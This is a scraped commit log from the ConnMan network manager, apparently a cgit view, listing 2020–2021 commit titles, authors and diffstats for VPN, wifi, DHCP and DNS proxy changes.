Laakkonen1\-0/+15 2021-09-13vpn: Report EALREADY back to caller if VPN is already disconnectingJussi Laakkonen1\-1/+2 2021-09-13gsupplicant: Add support for WPA3-Personal transition modeAriel D'Alessandro1\-10/+19 2021-08-31doc: Add new openconnect input fieldsLukáš Karas1\-0/+13 2021-08-30openconnect: Add support for 2nd passwordLukáš Karas2\-2/+85 2021-08-30vpn: Refactor connect\_reply() and handle NoCarrier -> ENOLINK errorJussi Laakkonen1\-2/+12 2021-08-30vpn-provider: Implement connmand online state checkingJussi Laakkonen1\-1/+356 2021-08-30service: Do not trigger wispr start when EnableOnlineCheck is disabledDaniel Wagner1\-0/+6 2021-08-30service: Move wispr start code into helperDaniel Wagner1\-16/+15 2021-08-29network: Do not disconnect decice on network connectDaniel Wagner1\-2/+0 2021-08-29service: Prevent auto connection during passphrase requestVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+25 2021-08-29wispr: Add online check url config optionsVAUTRIN Emmanuel (Canal Plus Prestataire)5\-15/+68 2021-08-29service: Fix default service update on ready stateVAUTRIN Emmanuel (Canal Plus Prestataire)1\-2/+2 2021-08-29service: Ignore state information in service reorderingVAUTRIN Emmanuel (Canal Plus Prestataire)1\-2/+1 2021-08-17pptp: Improve invalid auth and disconnect notify, fix cb useJussi Laakkonen1\-43/+84 2021-08-17l2tp: Improve invalid auth and disconnect notify, fix cb useJussi Laakkonen1\-40/+75 2021-08-17l2tp: Create control file for xl2tpdMatt Vogt1\-2/+16 2021-07-28gdhcp: Do not process missing DHCP\_SERVER\_ID fieldsDaniel Wagner1\-0/+5 2021-07-26service: service\_update\_preferred\_order cleanupVAUTRIN Emmanuel (Canal Plus Prestataire)1\-17/+5 2021-07-20AUTHORS: Fix Rahul's email addressDaniel Wagner1\-1/+1 2021-07-20main: Fix a memory leak for str\_list in parse\_configRahul Jain1\-0/+2 2021-07-02service: apply\_relevant\_default\_downgrade cleanupVAUTRIN Emmanuel (Canal Plus Prestataire)1\-7/+3 2021-07-02service: Let PreferredTechnologies overrule connected service sortingDaniel Wagner1\-13/+27 2021-06-30agent: Always inform upper layer via callbackDaniel Wagner1\-1/+1 2021-06-23service: Ask for password when using native autoconnectDaniel Wagner1\-1/+2 2021-06-23iwd: Do not try to handle out of memory failsDaniel Wagner1\-38/+6 2021-06-23vpn-rtnl: Fix netlink message alignmentDaniel Wagner1\-63/+62 2021-06-23rtnl: Fix netlink message alignmentDaniel Wagner1\-63/+62 2021-06-21README: Add IRC channel infoDaniel Wagner1\-0/+4 2021-06-21AUTHORS: Mention Lukáš' contributionsDaniel Wagner1\-0/+1 2021-06-21dnsproxy: Replace strncopy by memcpyLukáš Karas1\-1/+1 2021-06-14AUTHORS: Mention Ariel's contributionsDaniel Wagner1\-0/+1 2021-06-14wifi: Add wpa\_supplicant WPA3-SAE supportAriel D'Alessandro3\-3/+57 2021-06-10Release 1.401.40Marcel Holtmann2\-1/+6 2021-06-09AUTHORS: Mention Alyssa's contributionsDaniel Wagner1\-0/+1 2021-06-09README: fix typoAlyssa Ross1\-1/+1 2021-06-07AUTHORS: Mention Valery's contributionsDaniel Wagner1\-0/+1 2021-06-07dnsproxy: Check the length of buffers before memcpyValery Kashcheev1\-9/+11 2021-06-02README: Update mailing list infoDaniel Wagner1\-2/+8 2021-05-14README: Remove the 01.org website and the 01.org JiraMarcel Holtmann1\-5/+1 2021-05-13main: Cleanup of vendor class id and wifi config optionsVAUTRIN Emmanuel (Canal Plus Prestataire)7\-46/+10 2021-05-05wispr: Support of common redirection status codesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+5 2021-04-27timerserver: Fix time update manual->autoDaniel Wagner1\-2/+2 2021-04-25service: Disable native autoconnect calls for providersDaniel Wagner1\-2/+2 2021-04-18peer: Open code g\_memdupDaniel Wagner1\-1/+4 2021-04-18wifi: Open code g\_memdupDaniel Wagner1\-7/+18 2021-04-18Rewrite openconnect plugin to use libopenconnectSanttu Lakkala3\-382/+525 2021-04-18service: Teach autoconnect algorithm native modeDaniel Wagner2\-29/+56 2021-04-18network: Add \_\_connman\_network\_native\_autoconnect()Daniel Wagner2\-0/+8 2021-04-18iwd: Filter out connect failure for auto connect modeDaniel Wagner1\-1/+1 2021-04-18iwd: Init AutoConnect of know networksDaniel Wagner1\-0/+26 2021-04-18service: Factor auto connect trigger code into a new functionDaniel Wagner1\-34/+40 2021-04-18service: Remove unused \_\_connman\_service\_disconnect\_all()Daniel Wagner2\-31/+0 2021-04-05wireguard: Copy interfance names obeying lengths rulesDaniel Wagner1\-1/+1 2021-04-05ethernet: Copy interfance names obeying lengths rulesDaniel Wagner1\-5/+7 2021-04-05ipconfig: Refactor /proc value get/set to separate functionsJussi Laakkonen1\-85/+97 2021-04-05service: Sort VPNs using the transport service if connectedJussi Laakkonen1\-0/+45 2021-04-05provider: Add function to get transport ident from VPNJussi Laakkonen2\-0/+11 2021-04-05vpn: Return transport ident with get\_property()Jussi Laakkonen1\-7/+15 2021-03-27dnsproxy: Enable DNS servers on connected VPN if split routing changesJussi Laakkonen1\-0/+11 2021-03-27timeserver: Fix false error messageJustin Maggard1\-1/+1 2021-03-27iwd: Fix typo in error message when stopping AccessPoint modeJonathan Liu1\-1/+1 2021-03-27service: Allow only user connection after WiFi failureVAUTRIN Emmanuel (Canal Plus Prestataire)1\-4/+10 2021-03-27service: Fix disconnection search before connectingVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+1 2021-03-27service: Complete only after user connection retriesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+3 2021-03-27mailmap: Update non-canonical log entriesDaniel Wagner1\-0/+3 2021-02-24service: Add online to ready transition featureEmmanuel VAUTRIN6\-13/+78 2021-02-22service: Fix integer type for online check intervalDaniel Wagner1\-3/+3 2021-02-15service: Add online check interval config optionsVAUTRIN Emmanuel (Canal Plus Prestataire)5\-19/+88 2021-02-15wifi: Reset disconnecting status of any networkVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-02-10wifi: Check valid network in disconnect callbackVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-02-08Release 1.391.39Marcel Holtmann2\-1/+7 2021-02-05AUTHORS: Mention Colin's contributionsDaniel Wagner1\-0/+1 2021-02-05dnsproxy: Add length checks to prevent buffer overflowColin Wee1\-3/+11 2021-02-05gdhcp: Avoid leaking stack data via unitiialized variableColin Wee1\-1/+1 2021-02-05gdhcp: Avoid reading invalid data in dhcp\_get\_optionColin Wee4\-20/+38 2021-02-05service: Restart online check when default service changesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+10 2021-02-05timeserver: Reset time sync on system timeserver updateVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-02-05clock: Add TimeSynced signal emitted when the system time has been syncedVAUTRIN Emmanuel (Canal Plus Prestataire)4\-1/+67 2021-01-25AUTHORS: Mention Gabriel's contributionsDaniel Wagner1\-0/+1 2021-01-25wifi: Always disconnect connection completelyGabriel FORTE1\-8/+37 2020-12-28timeserver: Split new service and configuration updateDaniel Wagner3\-27/+33 2020-12-28services: Escape passphrase stringDaniel Wagner2\-7/+17 2020-12-23wifi: Base BSS expiration age on long scanning intervalEmmanuel VAUTRIN1\-0/+21 2020-12-22wifi: Fix wireless interface not being added to tether bridge sometimesJonathan Liu1\-4/+5 2020-12-22openvpn: Update documemtation for --protoDaniel Wagner1\-1/+1 2020-12-22vpnc: Do not lose credentials with VPN agent timeoutsJussi Laakkonen1\-6/+15 2020-12-14vpn: Export vpn\_ipconfig\_foreach as linker symbolDaniel Wagner4\-4/+4 2020-12-14vpn: Do not do mixed declerations and codeDaniel Wagner1\-18/+14 2020-12-14src: Test return value of inet\_pton consistentlyDaniel Wagner5\-17/+17 2020-12-11doc: Document VPN connection SplitRouting booleanJussi Laakkonen1\-1/+8 2020-12-11vpn-provider: Support SplitRouting option from connmandJussi Laakkonen1\-21/+158 2020-12-11vpn-provider: Drop route management from vpndJussi Laakkonen5\-100/+13 2020-12-11vpn-config: Implement function to get boolean from keyfileJussi Laakkonen2\-4/+21 2020-12-11vpn: Support SplitRouting in D-Bus variables, improve route codeJussi Laakkonen1\-20/+207 2020-12-11provider: Add support for managing SplitRoutingJussi Laakkonen2\-0/+105 2020-12-11service: Load and apply service settings after D-Bus registrationJussi Laakkonen1\-3/+3 2020-12-11service: Add property changed signal for SplitRouting valueJussi Laakkonen2\-0/+25 2020-12-11service: Expose set\_split\_routing() for internal useJussi Laakkonen2\-10/+15 2020-12-11service: Split service move functionality for internal useJussi Laakkonen2\-16/+46 2020-12-11dbus: Report back the return value of g\_dbus\_send\_message()Jussi Laakkonen1\-18/+6 2020-12-11inet: Do not add broadcast address for P2P/VPNsJussi Laakkonen20\-36/+123 2020-12-11inet: Refactor with getifaddrs() and add network route getter functionJussi Laakkonen2\-243/+326 2020-12-11inet: Add function for detecting a default routeJussi Laakkonen2\-0/+17 2020-12-11connection: Add getter for the phy index of a VPN transport serviceJussi Laakkonen2\-0/+24 2020-12-11wispr: check service before stopping portal detectionSergey Matyukevich1\-1/+17 2020-12-11AUTHORS: Mention Boleslaw's contributionsDaniel Wagner1\-0/+1 2020-12-11neard: Fix memory leaks with PendingCallBoleslaw Tokarski1\-1/+1 2020-12-11vpn: Fix memory leaks with PendingCallBoleslaw Tokarski1\-11/+30 2020-12-11vpn: Secure a race condition with flagBoleslaw Tokarski1\-2/+8 2020-12-11Revert "gdhcp: Make DHCP client timeouts suspend aware"Daniel Wagner2\-134/+52 2020-12-04vpn-provider: Cancel agent requests when removing VPNJussi Laakkonen1\-0/+6 2020-12-04AUTHORS: Mention Emmanuel's contributionsDaniel Wagner1\-0/+1 2020-12-04services: Return error for invalid hidden namesEmmanuel Vautrin1\-8/+12 2020-12-04AUTHORS: Mention Pieter's contributionsDaniel Wagner1\-0/+1 2020-12-04rtnl: Mark dsa interfaces as ethernet typePieter Cardoen1\-0/+3

Tag

#perl